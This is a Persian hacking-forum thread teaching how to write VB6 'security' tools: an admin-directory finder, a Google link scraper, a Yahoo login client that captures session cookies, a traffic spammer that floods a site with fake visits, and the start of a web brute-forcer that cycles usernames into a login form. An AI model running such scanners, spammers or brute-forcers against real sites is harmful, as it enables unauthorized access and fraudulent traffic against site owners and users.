SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

.:::تاپیک جامع آموزش ساخت نرم افزار های امنیتی:::.

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • .:::تاپیک جامع آموزش ساخت نرم افزار های امنیتی:::.

    بسم الله الرحمن الرحیم با سلام خدمت دوستان ایران هک :
    در این تاپیک قصد دارم به صورت جامع به شما دوستان عزیز نحوه ی نوشتن نرم افزار های امنیتی همانند هویج ، آلبالو ،دایرکتوری فایندر ها ، سی ام اس فایندر ها ، وب کرکر ها و ... رو آموزش بدم .
    لطفا سوالات و مباحثات مرتبط با این موضوع رو در همین تاپیک بپرسید .
    امیدوارم بتونم تو سطح آگاهی شما نقش داشته باشم .
    خب شروع می کنیم :
    زبان مورد استفاده در این مبحث: Microsoft Visual Basic 6
    دلیل استفاده از ویژوال بیسیک :
    به دلیل سادگی و سرعت بالا این زبان نیز منتخب این مبحث می باشد .
    کامپوننت های مورد استفاده :
    Microsoft Winsock Control V6
    Microsoft Internet Transfer Control 
    Microsoft Internet Control 
    بخش اول : نحوه ی نوشتن یک نرم افزار Directory Finder
    برای نوشتن یک برنامه برای اینکه دایرکتوری های داده شده به برنامه را پیدا کند شما می بایست برنامه ای بنویسید که بتواند تشخیص دهد آیا این صفحه موجود است یا خیر .
    چون مبحث رو از مبتدی شروع کردیم از یک روش ساده استفاده می کنیم.
    ما می خواهیم برنامه ای بنویسیم که یک لیست دایرکتوری را بگیرد و یک آدرس .
    سپس از روی آدرس سورس صفحه را برای ما در یک متغیر از نو String بریزد .
    بعد در سورسی که درون یک متغیر ریخت کلمه ی 404 که اکثر وبسایت برای صفحاتی که وجود ندارد از این کلمه استفاده می کنند بگردد . اگر این کلمه موجود نبود پس باید آدرس صفحه را در لیست دایرکتوری های پیدا شده بریزد .
    بعد به ترتیب سراغ نام دایرکتوری بعدی برود تا آخرین عنصر لیست .
    برای اینکار ما از کنترل Microsoft Internet Transfer Control استفاده می کنیم .
    خب یک فانکشن برای تست صفحات می نویسیم 


    کد:
    Private Function FindAdmin(Name As String)
    Dim x As String
    Dim notfound As Boolean
    x = Inet1.OpenURL(Text1.Text & "/" & Name)
    If InStr(x, "404") Then
    notfound = True
    Else
    List2.AddItem Text1.Text + "/" + Name
    End If
    End Function
    همانطور که دیدید این فانکش با استفاده از تابع instr درون سورس صفحه می گردد و اگر این کلمه موجود نباشد یعنی دایرکتوری موجود هست ،پس اون رو به لیست 2 اضافه می کند .
    برای لود کردن یک فایل متنی بعنوان لیست دایرکتوری توسط کاربر هم می تونید از کد زیر استفاده کنید :

    کد:
    Dialog1.ShowOpen
    FF = FreeFile
    Open Dialog1.FileName For Input As FF
    Do Until EOF(FF) = True
    Line Input #FF, GetText
    List1.AddItem GetText
    Loop
    Close #FF
    یک کلید با کپشن Start بسازید و کد زیر رو درونش بزارید 

    کد:
    StopWork = False
    List1.ListIndex = 0
    For i = 1 To Val(List1.ListCount) - 1
    If StopWork = True Then Exit Sub
    List1.ListIndex = Val(List1.ListIndex) + 1
    FindAdmin (List1.Text)
    Next
    این متغیر هم که برای استپ کردن پروژه هست در قسمت جنرال تعریف کنید 

    کد:
    Dim StopWork As Boolean
    یک کامند هم برای استپ کردن پروژه ساخته و کد زیر رو درونش بگذارید :

    کد:
    StopWork = True
    یک لیست با نام لیست 1 هم برای نگه داشتن لیست دایرکتوری های لود شده روی فرم بندازید .
    بخش یک تمام شد .
    دانلود سورس :



    کد:
    http://www.up2www.com/uploads/1394736048341.zip
    موفق باشین
     
    وقتی باران می بارد همه ی پرندگان دنبال جان پناه هستند ...
    اما عقاب برای اینکه از باران در امان بمانـــد بالاتر از ابر ها پرواز می کنــــد ...

  • #2
    .:::تاپیک جامع آموزش ساخت نرم افزار های امنیتی:::.

    بخش دوم :
    آموزش ساخت Google Linker 
    قصد دارم در این بخش به شما آموزش بدم که چطوری برنامه ای بسازید که یک رشته رو بگیره ، بعد بره در مورد اون رشته در گوگل سرچ کنه ، بعد لینک سایت های پیدا شده رو به شما توی یه لیست باکس نمایش بده و امکان ذخیره ی لینک ها هم داشته باشه :


    برای این کار از کنترل Microsoft Internet Control یا همون Web Browser استفاده می کنیم .
    خوب بریم سراغ برنامه :
    میخواهیم برنامه ای بنویسیم که یک رشته رو بگیره ، دنبال اون رشته توی گوگل بگرده ، نتایج اون رو توی برنامه نشون بده :
    خب بعد از اضافه کردن Web Browser به فرم یک دکمه با کپش Search روی فرم اضافه می کنیم و یک تکست باکس با نام txtsearch درونش این کد رو میزاریم :

    کد:
    WebBrowser1.Navigate "https://www.google.com/search?start=0&q=" & txtSearch.Text & "&hl=en"
    خب با اجرای این کد نتیجه ی جستجو توی فریم برا شما نمایش داده میشه .
    بریا دریافت لینک ها یک دکمه ی دیگه روی فرم + یک لیست باکس بندازین و توی دکمه این کد رو اضافه کنید :

    کد:
       Dim c
        Dim aLink As Object
        
        For Each aLink In WebBrowser1.Document.All.tags("A")
            If Mid(aLink, 1, 23) <> "https://www.google.com/" And Mid(aLink, 1, 38) <> "http://webcache.googleusercontent.com/" And Mid(aLink, 1, 22) <> "http://www.google.com/" And Mid(aLink, 1, 24) <> "https://www.youtube.com/" And Mid(aLink, 1, 24) <> "https://mail.google.com/" And Mid(aLink, 1, 25) <> "https://drive.google.com/" And Mid(aLink, 1, 29) <> "https://translate.google.com/" And Mid(aLink, 1, 24) <> "https://www.blogger.com/" And Mid(aLink, 1, 28) <> "https://accounts.google.com/" And Mid(aLink, 1, 18) <> "javascript:void(0)" And aLink <> "" And Mid(aLink, 1, 24) <> "https://maps.google.com/" And Mid(aLink, 1, 24) <> "https://play.google.com/" And Mid(aLink, 1, 23) <> "http://play.google.com/" And Mid(aLink, 1, 24) <> "https://news.google.com/" And Mid(aLink, 1, 26) <> "https://wallet.google.com/" And Mid(aLink, 1, 28) <> "http://picasaweb.google.com/" And Mid(aLink, 1, 28) <> "http://translate.google.com/" And Mid(aLink, 1, 23) <> "http://maps.google.com/" Then
                List1.AddItem aLink.href
            End If
        Next aLink
        
        Open App.Path & "\IRH.txt" For Output As #1
            For c = 0 To List1.ListCount - 1
                Print #1, List1.List(c)
            Next
        Close #1
    توضیح برخی اقسام کد :
    تابع Mid : سه پارامتر ورودی دریافت می کنه 

    کد:
    mid(string,start,len)
    این تابع از نقطه ی Start به طول Len زیر رشته رو از String جدا می کنه .
    کد For Eeach 
    از کد به معنی "برای هر کدام  " می باشد : یک مثال از این کد 

    کد:
    dim fso as new filesystemobject
    dim dr as drive
    for each dr in fso.drives
    print dr
    next dr
    این کد تمامی درایو های موجود در سیستم رو روی فرم چاپ می کنه .
    کد 
    WebBrowser1.Document.All.tags:
    شما می توانید کد های جاوایی که در وب استفاده می کنید اینجا هم استفاده کنید که بعدا در بخش کرکر ها به این موضوع می پردازم
    برای مثال :بدست آوردن تایتل صفحه 

    کد:
    print webbrowser1.document.title
    خب این بخش هم به اتمام رسید . 


     
    وقتی باران می بارد همه ی پرندگان دنبال جان پناه هستند ...
    اما عقاب برای اینکه از باران در امان بمانـــد بالاتر از ابر ها پرواز می کنــــد ...

    نظر


    • #3
      : .:::تاپیک جامع آموزش ساخت نرم افزار های امنیتی:::.

      بخش سوم 
      مروری بر آموزش کار با وینساک کنترل  
      در ویژوال بیسیک کنترلی با نام Microsoft Winsok Control وجود دارد که از آن برای ایجاد ارتباط بین دو سرور و کلاینت استفاده می شود . 
      همچنین برای نوشتن برنامه های شبکه از این کنترل نیز استفاده می گردد.
      ما میخواهیم برنامه ای بنویسیم که یک یوزر و پسورد به سمت سرور یاهو ارسال کند . در صورت درست بودن یوزر و پس در یاهو لاگین شویم و پیغامی مبتنی بر login شدن را در فرم نمایش دهیم . در صورت بروز هر گونه خطا هم پیغام error ظاهر شود .
      برای این کار باید یک Header به سمت سرور یاهو ارسال کنیم .میدونید که برای گرفتن هدر از یک افزونه ی مرورگر موزیلا فایرفاکس به نام Live Http Header نیز استفاده می شود. 
      برای ارسال هرگونه داده داده از :




      کد:
      winsok1.senddata Data
      استفاده می شه .
      خب برای لوگین کردن توی یاهو بعد از اضافه کردن وینساک به فرم کد زیر رو تو برنامه بنویسید :




      کد:
      Private Sub Winsock1_Connect()
      On Error Resume Next
          status.Caption = "Connecting"
          Dim LoginYahoo As String
          LoginYahoo = "GET http://login.yahoo.com/config/login?login=" & id.Text & "&passwd=" & pass.Text & " HTTP/1.1" & vbCrLf
          LoginYahoo = LoginYahoo & "Accept-Language: en-us" & vbCrLf
          LoginYahoo = LoginYahoo & "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Expulsion-Creations)" & vbCrLf
          LoginYahoo = LoginYahoo & "Accept: */*" & vbCrLf
          LoginYahoo = LoginYahoo & "Host: login.yahoo.com" & vbCrLf
          LoginYahoo = LoginYahoo & "Connection: Keep-Alive" & vbCrLf & vbCrLf
          Winsock1.SendData LoginYahoo
      End Sub
      همچنین یک دکمه با کپشن Login ساخته و کد زیر رو درونش بنویسید :



      کد:
      Winsock1.Close
      Winsock1.Connect "login.yahoo.com", "80"
      برای دریافت پاسخ از طرف سرور بعد از ارسال هدر هم می تونید از کد زیر استفاده کنید :



      کد:
      Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
      On Error Resume Next
          Winsock1.GetData Data
          If InStr(Data, "Yahoo! - 400 Bad Request") Then
              status.Caption = "Bad ID/Password"
              Winsock1.Close
          Exit Sub
          Else
          If InStr(Data, "302 Found") Then
              StrYcook = Split(Data, "Y=")(1)
              StrYcook = Split(StrYcook, "np=1")(0)
              StrYcook = "Y=" & StrYcook & "np=1;"
              StrTcook = Split(Data, "T=")(1)
              StrTcook = Split(StrTcook, ";")(0)
              StrTcook = "T=" & StrTcook
              Debug.Print "connect to port 80"
              Winsock1.Close
              Winsock2.Close
              Winsock2.Connect "scs.msg.yahoo.com", 5050
          Else
          status.Caption = "Error"
          Exit Sub
          End If
          End If
      End Sub
      یک label هم با نام Status میبایست برای نمایش وضعیت به فرم نیز اضافه کنید 
      برای دریافت LoginCookie یک وینساک دیگه به فرم اضافه نموده و کد زیر رو به برنامه اضافه کنید :




      کد:
      Private Sub Winsock2_Connect()
      Winsock2.SendData Login(id.Text, StrYcook, StrTcook)
      End Sub
      
      Private Sub Winsock2_DataArrival(ByVal bytesTotal As Long)
      On Error Resume Next
          Dim Data As String
          Winsock2.GetData Data
          
          Select Case Asc(Mid(Data, 12, 1))
              Case 85
                  status.Caption = "Logged in"
                  'blnconnected = True
              Case 2
                  If InStr(Data, "ÿÿÿÿ") Then
                      status.Caption = "Logged Out By Server"
                      'blnconnected = False
                      Winsock2.Close
                  End If
          End Select
      End Sub
      چیز خاصی فکر نکنم داشته باشه instr و mid هم که در بالا توضیح دادم .
      دانلود سورس برنامه ی کامل :

      کد:
      http://www.up2www.com/uploads/1394736173351.zip
      موفق باشین
       
      وقتی باران می بارد همه ی پرندگان دنبال جان پناه هستند ...
      اما عقاب برای اینکه از باران در امان بمانـــد بالاتر از ابر ها پرواز می کنــــد ...

      نظر


      • #4
        .:::تاپیک جامع آموزش ساخت نرم افزار های امنیتی:::.

        بخش چهارم 
        آموزش ساخت یک برنامه ی اسپامر (Traffic Spammer)
        قصد داریم یک برنامه بنویسیم که به عبارتی بازدید یک سایت رو بالا ببره ، 
        برای این کار از کنترل Microsoft Winsock Control استفاده می نماییم .
        همچنین می بایست از آرایه ی کنترلی Array Control نیز استفاده کنیم .
        (اگر آشنایی با مباحث پایه ندارید سرچ کنید)
        می خواهیم برنامه ای بنویسیم که یک عدد N را بگیرد ، به تعداد N بازدید روی سایت بفرستد ، 
        یعنی می بایست یک هدر را N بار به سایت مورد نظر نیز ارسال نماییم .
        خب شروع می کنیم .
        کد:
        Dim header As String
        Dim n As Double
        Public Sub con()
        For x = 0 To n
        Winsock1(x).Close
        DoEvents
        Winsock1(x).Connect Text1.Text, 80
        Next
        Label1.Caption = "Start..."
        End Sub
        Private Sub Winsock1_Connect(Index As Integer)
        n = n + 1
        Load Winsock1(n)
        Label1.Caption = "Send..."
        header = header & "GET / HTTP/1.1" & vbCrLf
        header = header & "Host: " & Text1.Text & vbCrLf
        header = header & "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0 AlexaToolbar/alxf-2.19" & vbCrLf
        header = header & "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" & vbCrLf
        header = header & "Accept-Language: en-US,en;q=0.5" & vbCrLf
        header = header & "Accept -Encoding: gzip , deflate" & vbCrLf
        header = header & "Connection: keep -alive" & vbCrLf & vbCrLf
        Winsock1(Index).SendData header
        End Sub
        Private Sub Winsock1_DataArrival(Index As Integer, ByVal bytesTotal As Long)
        Label1.Caption = "Finish..."
        Winsock1(Index).Close
        DoEvents
        Label3.Caption = Label3.Caption + 1
        header = ""
        If Label3.Caption <> Text2 Then
        con
        End If
        If Label3.Caption = Text2 Then
        MsgBox "Finish...", vbOKOnly, "Finish...."
        End If
        End Sub
        Private Sub Command1_Click()
        Winsock1(0).Connect Text1.Text, 80
        End Sub
        خب ما اومدیم با یه کامند ارتباط رو بین برنامه و تارگت مورد نظر وصل کردیم .
        برای وینساک هم تعریف کردیم اگر به هدف وصل شد (Winsock1_connect) هدر را ارسال کند .
        سپس اگر ارسال موفقیت آمیز بود و سرور پاسخی مبتنی بر موفقیت آمیز بودن اتصال و ارسال هدر ارسال کرد دوباره به همین ترتیب اتصال را قطع می کنیم و دوباره وصل می کنیم .
        شرط مشخص کننده ی پایان کار هم این کد مشخص می کند .
        کد:
        If Label3.Caption = Text2 Then
        MsgBox "Finish...", vbOKOnly, "Finish...."
        End If
        دانلود سورس کامل برنامه :
        کد:
        http://www.up2www.com/uploads/1394780390271.zip
        موفق باشین [img]images/smilies/Smileys/8.gif[/img] [img]images/smilies/Smileys/8.gif[/img] [img]images/smilies/Smileys/8.gif[/img]
        وقتی باران می بارد همه ی پرندگان دنبال جان پناه هستند ...
        اما عقاب برای اینکه از باران در امان بمانـــد بالاتر از ابر ها پرواز می کنــــد ...

        نظر


        • #5
          RE: .:::تاپیک جامع آموزش ساخت نرم افزار های امنیتی:::.

          بلک عزیز در پایان توضیحاتت سورس ذخیره شده برنامه را در vb6 ، آپلود کن و واسه دانلود بزار / امکان دانلود فقط برای اعضای عضو میسر هست ، اینطوری خیلی بهتره .
          [align=center][/align]

          نظر


          • #6
            :::تاپیک جامع آموزش ساخت نرم افزار های امنیتی:::.

            نحوه ی نوشتن وب کرکر ها 
            وب کرکر و بروت فورسر ها برنامه هایی هستند که چندین رمز را روی لاگین پیج یک سایت یا سرور تست کرده و این عمل می تواند تا باز کردن قفل مورد نظر نیز ادامه داشته باشد .
            در ویژوال بیسیک و سی شارپ و دلفی امکانات خوبی برای نوشتن این نوع برنامه هست .
            در ویژوال بیسیک ما برای انجام حملات بروت فورس می توانیم از هر سه کنترل Microsoft Internet Control - Microsoft Internet Transfer - Microsoft Winsouck نیز استفاده نماییم .
            برای استفاده از Winsock ما می توایم هرباریوزر و پس را وارد نماییم .
            اما بنده با یه روش خیلی ساده و کاربردی تر و با استفاده از کنترل Microsoft Internet Control این مبحث رو برای شما توضیح می دم.
            برای این کار :
            یک کنترل Internet Control با نام  Web1 روی فرم بندازید .
            کد:
            Dim x As Integer
            Dim user(100) As Integer
            Dim i As Integer
            Private Sub crack()
            i = Val(i) + 1
            Web1.Navigate ("www.site.com")
            x = user(i)
            Web1.Document.getElementById("username").Value = x
            End Sub
            Private Sub Form_Load()
            Web1.Navigate ("www.site.com")
            End Sub
            Private Sub Web1_DocumentComplete(ByVal pDisp As Object, URL As Variant)
            Call crack
            End Sub
            به کد های بالا دقت نمایید ...
            در این کد ها شما هر بار یکی از عناصر آرایه را در کادر یوزرنیم سایت جایگذاری می کنید و با کد
            کد:
            Web1.Document.formloginName.Clicked
            می توانید دکمه ی Login را فشار داده و تک تک یوزر هارو روی سایت تست نمایید .
            این بخش ادامه دارد ...
            وقتی باران می بارد همه ی پرندگان دنبال جان پناه هستند ...
            اما عقاب برای اینکه از باران در امان بمانـــد بالاتر از ابر ها پرواز می کنــــد ...

            نظر

            صبر کنید ..
            X